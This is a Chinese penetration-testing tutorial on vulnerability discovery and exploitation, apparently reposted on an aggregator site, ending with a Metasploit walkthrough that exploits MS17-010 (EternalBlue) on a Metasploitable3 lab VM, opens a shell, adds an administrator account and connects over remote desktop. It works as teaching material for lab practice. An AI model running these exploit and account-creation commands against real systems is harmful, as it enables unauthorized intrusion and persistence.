渗透测试--2.漏洞探测和利用

这篇具有很好参考价值的文章主要介绍了渗透测试--2.漏洞探测和利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一.漏洞分类

二.漏洞探测

三.漏洞利用

四.漏洞扫描

1.Nessus

2.Web应用漏洞扫描器——DVWA

五.Metasploit漏洞利用


一.漏洞分类

  • 网络漏洞 渗透测试--2.漏洞探测和利用
  • 系统漏洞 渗透测试--2.漏洞探测和利用
  • 应用漏洞渗透测试--2.漏洞探测和利用
  •  人为不当配置渗透测试--2.漏洞探测和利用

渗透测试--2.漏洞探测和利用

二.漏洞探测

渗透测试是一种测试网络、应用程序和系统安全性的方法,旨在发现并利用漏洞和安全漏洞,以评估系统的安全性。

以下是一些漏洞探测的方法:

  1. 端口扫描:通过扫描目标系统上的端口,确定哪些服务正在运行,以及它们的版本和配置信息。渗透测试人员可以使用常见工具如Nmap、Metasploit等进行端口扫描。

  2. 漏洞扫描:渗透测试人员可以使用漏洞扫描工具来扫描目标系统上已知的漏洞,并尝试利用它们。常见的漏洞扫描工具有Nessus、OpenVAS等。

  3. 社会工程学:社会工程学是一种利用人类心理学和社交工具的技术,目的是获取敏感信息或访问受保护的系统。渗透测试人员可以使用社会工程学技术来获取用户名和密码等敏感信息。

  4. 模糊测试:渗透测试人员可以使用模糊测试技术来发现应用程序的漏洞。模糊测试是一种随机输入的技术,用于测试应用程序的边界条件和异常情况。

  5. 嗅探:嗅探是一种技术,可以捕获正在传输的数据包,并分析其中的信息。渗透测试人员可以使用嗅探技术来获取敏感信息,例如用户名和密码。

渗透测试是一项复杂的任务,需要深入了解目标系统的结构和漏洞,以及掌握多种工具和技术来发现和利用漏洞。

三.漏洞利用

漏洞利用是指利用已知或未知漏洞来攻击目标系统或应用程序,以获得未经授权的访问或执行恶意操作。以下是一些常见的漏洞利用方法:

  1. 缓冲区溢出:缓冲区溢出是指攻击者利用程序中的缓冲区溢出漏洞,覆盖程序的栈或堆,以执行恶意代码或控制程序的执行流程。

  2. SQL注入:SQL注入是指攻 击者通过向应用程序输入恶意SQL语句来获取敏感数据或控制数据库。

  3. XSS攻击:XSS攻击是指攻击者通过注入恶意脚本来欺骗用户,从而窃取用户的信息或执行恶意操作。

  4. CSRF攻击:CSRF攻击是指攻击者利用用户在已登录的状态下,向应用程序发送恶意请求,从而执行未经授权的操作。

  5. 文件包含漏洞:文件包含漏洞是指攻击者利用应用程序中的文件包含漏洞,向服务器请求包含恶意脚本的文件,从而执行恶意操作。

漏洞利用需要深入了解目标系统或应用程序的漏洞,以及掌握各种技术和工具来执行攻击。同时,漏洞利用是非法的行为,可能会导致严重的安全问题和法律后果。因此,建议只在合法授权和道德准则下进行漏洞利用。


四.漏洞扫描

1.Nessus

Nessus是一款C/S架构的漏洞扫描系统,作为一款漏洞扫描软件,不仅功能全面,

而且还可以实时更新漏洞库,据统计有超过75,000个机构在使用它。该工具提供完整的电

脑漏洞扫描服务,并随时更新其漏洞数据库。Nessus不同于传统的漏洞扫描软件,

Nessus可同时在本机或远端上遥控,进行系统的漏洞分析扫描

注册安装:kali安装Nessus_太菜是我的的博客-CSDN博客

2.Web应用漏洞扫描器——DVWA

DVWA(Damn Vulnerable Web Application)一个用来进行安全脆弱性鉴定的 PHP/MySQL Web 应用(Web 渗透技巧的靶机环境)。

其主要目标是帮助安全专业人员 在法律环境中测试他们的技能和工具,帮助Web开发人员更好地了解保护Web应用程序 的过程。

DVWA的目标是通过简单直接的界面练习一些最常见的Web漏洞,具有各种难度。

DVWA共有十个模块:

Brute Force(暴力破解)

Command Injection(命令行注入)

CSRF(跨站请求伪造)

File Inclusion(文件包含)

File Upload(文件上传)

Insecure CAPTCHA (不安全的验证码)

SQL Injection(SQL注入)

SQL Injection(Blind)(SQL盲注)

XSS(Reflected)(反射型跨站脚本)

XSS(Stored)(存储型跨站脚本)

渗透测试--2.漏洞探测和利用

五.Metasploit漏洞利用

Metasploit是一款开源的安全漏洞检测工具。它可以帮助网络安全测试人员识别安全

性问题,验证漏洞的解决措施,从而完成对目标的安全性评估。


metasploit 利用 MS17-010 永恒之蓝漏洞进行攻击

1.实验环境

操作机:kali-linux-2022.4-vmware-amd64.vmwarevm
目标机: metasploitable3(Windows 7)(含多种漏洞)


2.主机扫描

靶机ip:192.168.76.138

渗透测试--2.漏洞探测和利用

主机扫描:nmap -sP 192.168.76.138

端口扫描:nmap -Pn 192.168.76.138

渗透测试--2.漏洞探测和利用


3.漏洞利用

首先打开msfconsole,利用 metasploit

渗透测试--2.漏洞探测和利用

找到永恒之蓝(ms17-010)对应的模块:search ms17-010 渗透测试--2.漏洞探测和利用

 扫描模块位置:
 auxiliary/scanner/smb/smb_ms17_010    
 
 攻击代码位置:
 exploit/windows/smb/ms17_010_eternalblue
 exploit/windows/smb/ms17_010_eternalblue_win8  
 exploit/windows/smb/ms17_010_psexec            
 exploit/windows/smb/smb_doublepulsar_rce 

利用永恒之蓝扫描,查看是否可以对目标机利用ms17-010

use auxiliary/scanner/smb/smb_ms17_010   
set RHOSTS 192.168.76.138    设置远端ip
run

渗透测试--2.漏洞探测和利用

利用payload攻击

use exploit/windows/smb/ms17_010_eternalblue
set RHOSTS 192.168.76.138     //设置被攻击者的IP
set lhost 192.168.76.134       

set payload windows/x64/shell/bind_tcp//获取靶机权限

//设置LHOST,也就是我们主机的ip,用于接收从目标机弹回来的shell
run

渗透测试--2.漏洞探测和利用

攻击成功,成功获取shell

渗透测试--2.漏洞探测和利用


 4.后期渗透阶段

在靶机上创建新用户

net user 用户名 密码 /add

net user gyp gyp /add

将用户gyp添加至管理员组

net localgroup administrators gyp /add

net user //便可查看创建的用户

渗透测试--2.漏洞探测和利用  


开启远程桌面

第一步:查看3389端口是否开启

查看端口命令:netstat -ano

渗透测试--2.漏洞探测和利用

第二步:再开启一个终端

输入命令:rdesktop 192.168.76.138

入侵系统成功:渗透测试--2.漏洞探测和利用文章来源地址https://www.toymoban.com/news/detail-446798.html

到了这里,关于渗透测试--2.漏洞探测和利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 主机探测与端口扫描-渗透测试模拟环境(2)

    本篇将介绍主机探测与端口扫描渗透模拟环境下整理的各类收集方法、各类工具技术使用的演示,阅读后可用在工作上 。 往期系列文章: 渗透攻防环境搭建与攻防知识体系思维导图 渗透模拟环境配置和工具介绍-渗透测试模拟环境(0)_luozhonghua2000的博客-CSDN博客 外围信息搜集

    2024年02月06日
    浏览(29)
  • 【kali-漏洞利用】(3.4)Metasploit渗透攻击应用:MySQL渗透过程

    目录 一、渗透攻击MySQL 1.1、第一步:信息收集 db_nmap扫描(内置、外置都可) Metasploit模块 sqlmap 1.2、第二步:获取服务器权限(爆破) MySQL 口令爆破 哈希值爆破 泄露的源码中寻找数据库密码 向服务器写WebShell 1.3、第三步:提权 UDF提权(UDF提权) Mof提权 MySQL启动项提权 1

    2024年02月08日
    浏览(27)
  • 2-Lampiao百个靶机渗透(精写-思路为主)框架漏洞利用2

    特别注明:本文章只用于学习交流,不可用来从事违法犯罪活动,如使用者用来从事违法犯罪行为,一切与作者无关。 前言: 我们上个笔记是常规收集可用信息,爆破拿到ssh账户提权得到root的shell 这次我们用框架来尝试两种不同方法拿到shell 思路清晰,先说步骤 1.信息收集

    2024年02月02日
    浏览(42)
  • 渗透测试漏洞原理之---【任意文件读取漏洞】

    1、概述 一些网站的需求,可能会提供文件查看与下载的功能。如果对用户查看或下载的文件没有限制或者限制绕过,就可以查看或下载任意文件。这些文件可以是源代码文件,配置文件,敏感文件等等。 任意文件读取会造成(敏感)信息泄露; 任意文件读取大多数情况是由

    2024年02月10日
    浏览(35)
  • 渗透测试之逻辑漏洞

    那么这个修改价格具体是修改哪一步时的价格呢?在我看来,你可以在这三个步骤当中的随便一个步骤进行修改价格测试,如果前面两步有验证机制,那么你可在最后一步付款时进行抓包尝试修改金额,如果没有在最后一步做好检验 存在可修改订单状态的接口,比如确认收货

    2024年02月12日
    浏览(29)
  • 【渗透测试】利用Cobalt Strike渗透Windows

    在kali中使用Cobalt Strike对Windows进行渗透 kali(服务端):192.168.175.129 win11(攻击机):192.168.175.128 win11(靶机):192.168.175.137 将压缩包解压 进入解压后的Server文件夹,赋予文件执行权限 192.168.175.129为Kali机器的IP, 1234 为团队接入的口令,后面需要用到 在Win11攻击机中将Coba

    2024年02月16日
    浏览(25)
  • [渗透测试]—5.2 网络协议漏洞

    在这一章节中,我们将学习网络协议漏洞,如ARP欺骗、DNS欺骗等,并通过实例来讲解如何利用这些漏洞进行网络渗透测试。请放心,我们会尽量讲得详细、通俗易懂,并提供尽可能多的实例。 网络协议是计算机网络中设备之间通信的规则。然而,许多网络协议在设计时并未充

    2024年02月11日
    浏览(37)
  • 简单漏洞复现_网络渗透测试

    一、漏洞渗透测试 1、靶机(Windows)安装easy file sharing server(efssetup_2018.zip),该服务存在漏洞。 2、利用Nmap扫描发现靶机(Windows)运行了该服务。 3、利用该漏洞,使得靶机运行计算器。 获取easy file sharing server 链接:https://pan.baidu.com/s/1WRasVlAb_st--7ZeOkwNVQ  提取码:1vx1 主要步骤 1

    2024年02月05日
    浏览(40)
  • 渗透测试漏洞原理之---【业务安全】

    1.1业务安全现状 1.1.1、业务逻辑漏洞 近年来,随着信息化技术的迅速发展和全球一体化进程的不断加快,计算机和⽹络已经成为与所有⼈都息息相关的⼯具和媒介,个⼈的⼯作、⽣活和娱乐,企业的管理,乃⾄国家的发展和改⾰都⽆处其外。信息和互联⽹带来的不仅仅是便利

    2024年02月09日
    浏览(27)
  • 渗透测试漏洞原理之---【组件安全】

    A9:2017-Using Components with Known Vulnerabilities A06:2021 – Vulnerable and Outdated Components 组件(例如:库、框架和其他软件模块)拥有和应用程序相同的权限。如果应用程序中含有已知漏洞的组件被攻击者利用,可能会造成严重的数据 丢失或服务器接管。同时,使用含有已知漏洞的组件

    2024年02月09日
    浏览(33)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包